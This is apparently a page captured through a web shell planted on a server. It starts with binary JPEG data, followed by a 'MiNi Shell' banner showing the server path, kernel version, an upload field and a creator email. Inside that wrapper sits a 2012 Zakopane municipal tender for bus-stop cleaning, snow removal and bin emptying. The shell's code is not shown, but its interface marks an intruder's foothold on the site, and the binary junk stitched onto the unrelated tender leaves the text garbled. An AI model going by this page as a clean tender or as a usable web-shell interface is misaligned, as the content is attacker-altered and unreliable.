JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121127/250685-N-2012.html

<p class="kh_header"><b>Zakopane: BZP.271.134.2012 świadczenie  usług  polegających  na  zimowym i letnim utrzymaniu  przystanków komunikacyjnych  na terenie Gminy Miasta Zakopane oraz opróżnianiu i wywozie nieczystości z koszy znajdujących się na przystankach.</b><br>
<b>Numer ogłoszenia: 250685 - 2012; data zamieszczenia: 27.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.134.2012 świadczenie  usług  polegających  na  zimowym i letnim utrzymaniu  przystanków komunikacyjnych  na terenie Gminy Miasta Zakopane oraz opróżnianiu i wywozie nieczystości z koszy znajdujących się na przystankach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest wykonywanie  usług polegających na  zimowym    i letnim utrzymaniu  przystanków komunikacyjnych  na terenie Gminy Miasta Zakopane o łącznej powierzchni  826 m2  oraz opróżnianiu i wywozie nieczystości z koszy znajdujących się na przystankach.

                 Jako przystanek komunikacyjny, rozumie się wiatę lub słupek przystankowy  obejmujący obszar zgodnie z załącznikiem nr 1 i 2 do niniejszej siwz.

Zakres zamówienia : 

1.	Letnie utrzymanie  czystości  na przystankach komunikacyjnych obejmować będzie powierzchnię wiaty przystankowej lub słupka przystankowego zgodnie z załącznikiem nr 1 i 2 do  siwz  i polega na:
1.	Sprzątaniu i zamiataniu  wnętrza  wiaty przystankowej  i terenu dookoła niej zgodnie z załącznikiem nr 1 do  siwz
2.	Sprzątaniu i zamiataniu terenu wokół słupka przystankowego obejmujący  obszar 1 m2 zgodnie z załącznikiem nr 2 do  siwz
3.	Sprzątaniu i zamiataniu z terenu wiaty przystankowej i słupka przystankowego oraz z chodnika i pobocza do 2 mb od wiaty  przystankowej i do 1 m2 od słupka przystankowego zanieczyszczeń, tj. liści, papierów, szkła, elementów                         z tworzyw sztucznych, niedopałków papierosów itp.
4.	Usuwaniu trawy i chwastów z terenu wokół słupka przystankowego obejmujący obszar 1 m2 i z terenu wiaty przystankowej do 2 mb od niej. 
5.	Sprzątaniu  i usuwaniu pozostałości wybitych szyb oraz uszkodzonych elementów drewnianych z wiat przystankowych,
6.	Zabezpieczeniu zdewastowanego przystanku komunikacyjnego tj. wygrodzenie terenu,
7.	Informowaniu Zamawiającego o ilości i wymiarach wybitych szyb oraz lokalizacji wiat, w których stwierdzono  dewastację,
8.	Uzupełnienie brakujących elementów drewnianych w wiatach przystankowych,
9.	Czyszczeniu i likwidacji napisów, plakatów i ogłoszeń ze słupków przystankowych, tablic znaku przystankowego (D-15), wiat przystankowych oraz ramek i gablot przystankowych z rozkładami jazdy, za wyjątkiem ogłoszeń Burmistrza Miasta Zakopane.
W razie konieczności malowanie wiat przystankowych w celu zachowania właściwej estetyki.
10.	Częstotliwość sprzątania  Zamawiający wyznacza na trzy razy w tygodniu tj. w poniedziałek, środę i sobotę do godziny 10.00 .



2.	Zimowe  utrzymanie  czystości  na przystankach  komunikacyjnych  obejmować   
będzie  powierzchnię wnętrza wiaty przystankowej i terenu dookoła niej oraz słupka przystankowego zgodnie z załącznikiem nr 1 i 2 do  siwz  i polega na:
1.	Wykonawca  rozpoczyna akcję  związaną z odśnieżaniem  przystanków komunikacyjnych  nie później niż dwie godziny  po rozpoczęciu intensywnych opadów śniegu,
2.	Całkowite usunięcie śniegu  ma nastąpić najpóźniej  trzy godziny po ustaniu opadów,
3.	Ponadto z obsługiwanych przystanków komunikacyjnych na bieżąco należy usuwać  śnieg, błoto pośniegowe, ubitą przymarzniętą do nawierzchni warstwę lodu  oraz  usuwać występującą śliskość poprzez stosowanie materiałów uszorstniających,
4.	Prace związane  z odśnieżaniem  można prowadzić przy użyciu sprzętu specjalistycznego lub ręcznie. W przypadku użycia sprzętu  winien to być sprzęt lekki, którego  masa wraz z osprzętem nie przekroczy dwóch ton.
5.	Pryzmowanie śniegu na przystanku lub poboczu drogi należy  wykonywać             w sposób nie powodujący utrudnień w ruchu pieszych, nie powodujący znacznego zawężenia przystanku lub pobocza oraz nie utrudniający dostęp do przejść dla pieszych,
6.	Niedopuszczalne jest odkładanie śniegu z przystanków na jezdnię,
7.	W przypadku  intensywnych opadów i braku możliwości  pryzmowania śniegu - śnieg należy wywieźć
8.	Zabezpieczenie prowadzonych robót przy odbywającym się ruchu na objętym robotami fragmencie przystanku, jak również uczestniczących w tym ruchu osób i pojazdów należy do  Wykonawcy
9.	Sprzątaniu  i usuwaniu  pozostałości wybitych szyb oraz uszkodzonych elementów drewnianych z wiat przystankowych,
10.	Zabezpieczeniu zdewastowanego przystanku komunikacyjnego tj. wygrodzenie terenu,
11.	Informowaniu Zamawiającego o ilości i wymiarach wybitych szyb oraz lokalizacji  wiat, w których stwierdzono  dewastację,
12.	Uzupełnieniu brakujących elementów drewnianych w wiatach przystankowych,
13.	Czyszczeniu i likwidacji  napisów, plakatów i ogłoszeń  ze słupków przystankowych, tablic znaku przystankowego (D-15), wiat  przystankowych oraz ramek i gablot przystankowych z rozkładami jazdy, za wyjątkiem ogłoszeń Burmistrza Miasta Zakopane.
W razie konieczności malowanie wiat przystankowych w celu zachowania właściwej estetyki.
14.	Czynności  zimowego utrzymania prowadzone będą jako (akcja czynna) polegająca na pełnym zimowym utrzymaniu przystanków, 
15.	Czynności zimowego utrzymania prowadzone będą również jako (akcja bierna), polegająca na utrzymaniu stałej gotowości do ewentualnego prowadzenia akcji czynnej. Akcja bierna występuje w przypadku ustabilizowanych warunków pogodowych.
16.	Zamawiający będzie każdorazowo określał na piśmie z jednodniowym wyprzedzeniem terminy rozpoczęcia czynności zimowego i letniego utrzymania oraz  wprowadzenia  akcji czynnej i biernej jak również zawieszenie akcji zimowego utrzymania. 
17.	Zawieszenie akcji zimowego utrzymania skutkuje rozpoczęciem przez Wykonawcę realizacji sprzątania po zimie. Sprzątanie powinno zostać zrealizowane w ciągu 3 dni - licząc od dnia zawieszenia akcji zimowego utrzymania.	
18.	W  przypadku, gdy zawieszenie akcji zimowego utrzymania trwa dłużej niż 3 dni od 4 dnia zawieszenia Wykonawca  rozpoczyna czynności wykonywania usługi letniego utrzymania przystanków komunikacyjnych.
19.	Zakończenie akcji zimowego utrzymania zobowiązuje Wykonawcę do rozpoczęcia realizacji sprzątania po zimie. Sprzątanie powinno zostać zrealizowane w ciągu 3 dni od dnia zakończenia akcji  zimowego utrzymania. Wykonanie tego obowiązku podlega odbiorowi przez Zamawiającego. Za wykonanie tego obowiązku Wykonawcy nie przysługuje prawo do dodatkowego wynagrodzenia.
20.	Okres wykonywania czynności sprzątania po zimie płacony będzie proporcjonalnie z zimowego utrzymania przystanków akcji czynnej.


3.	Za okres zimowy  przyjmuje się okres od 1 stycznia 2013 r. do 30 kwietnia 2013 r.              i od 1 listopada 2013 r. do 31 grudnia 2013 r.

- Zamawiający  wyznacza termin  rozpoczęcia  czynności zimowego utrzymania po wystąpieniu warunków atmosferycznych uzasadniających rozpoczęcie zimowego utrzymania czystości na przystankach
- Zamawiający   każdorazowo  określał będzie na piśmie  z jednodniowym wyprzedzeniem  terminy rozpoczęcia i zakończenia czynności  zimowego i letniego  utrzymania ,
-  W wypadku konieczności  przystąpienia  do czynności zimowego utrzymania                  w dzień  ustawowo wolny od pracy(gwałtowna zmiana warunków atmosferycznych), Wykonawca   przystępuje do  robót po  zawiadomieniu   telefonicznym 
(potwierdzonym pisemnie)przekazanym przez przedstawiciela Zamawiającego , doba rozliczeniowa  rozpoczyna się w dniu przystąpienia  do czynności  zimowego utrzymania .
- Wykonawca  zobowiązany  jest do usunięcia w trybie awaryjnym  śmieci, śniegu, posypania przystanku  materiałem uszorstniającym wskazanych przez przedstawiciela Zamawiającego, a w szczególnych przypadkach  przez  Policję, Straż Miejską - zawiadamiając  o tym przedstawiciela  Zamawiającego.

4.  Opróżnianie koszy  na śmieci zlokalizowanych  przy przystankach komunikacyjnych 
     z częstotliwością gwarantującą  ich należyty stan sanitarno porządkowy.
     - przy wiatach  przystankowych  oraz słupkach przystankowych wymienionych zgodnie   
       z Załącznikiem  nr  3  do siwz - znajduje się 66 sztuk koszy - w tym  4 szt.  koszy o 
       pojemności    50 litrów  i 62 szt. koszy  o pojemności 70 litrów

     - częstotliwość opróżniania  koszy Zamawiający  ustala w  następujący sposób:
 
             od 1 stycznia 2013 r. do 30 czerwca 2013 r. 3 razy w tygodniu tj. poniedziałek, środa 
             i sobota do godziny 10.00,
             od 1 lipca 2013 r. do 30 września 2013 r. codziennie do godziny 10.00,
             od 1 października 2013 r. do 31 grudnia 2013 r. 3 razy w tygodniu tj. poniedziałek, 
             środa i sobota do godziny 10.00.


             
5.Wykonawca będzie ponosić pełną odpowiedzialność za ewentualne szkody wynikłe wobec 
Zamawiającego i osób trzecich spowodowane  niewłaściwym świadczeniem usług objętych zamówieniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.71.21.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca  wykaże ,że posiada  aktualne 
-zezwolenie na zbieranie i transport odpadów, wydane przez  właściwe organy na podstawie    ustawy z  dnia   27 kwietnia 2001 r.  o  odpadach    ( tj. Dz.U. z2010 r. Nr 185, poz 1243 z późn. zm.) 


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 3 lat przed  upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie świadczył  lub świadczy  co najmniej 1  usługę polegającą   na zimowym i letnim utrzymaniu powierzchni ulic , chodników o  łącznej powierzchni nie mniejszej niż 1000m2 

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
      

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma dołączyć do oferty umowę, ewentualnie pisemne  przyrzeczenie lub umowę przedwstępną ze składowiskiem  na odbiór odpadów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>w zawartej umowie w stosunku do treści oferty może nastąpić w następujących przypadku:

- ustawowych zmian stawek podatku VAT w trakcie obowiązywania umowy -
zamawiający dopuszcza zmianę cen wyłącznie w przypadku ustawowej zmiany stawki
podatku VAT, przy czym zmianie ulegną  wyłącznie ceny  brutto usług , ceny  netto pozostaną bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Drogownictwa i Transportu pok.221
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok. 8 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com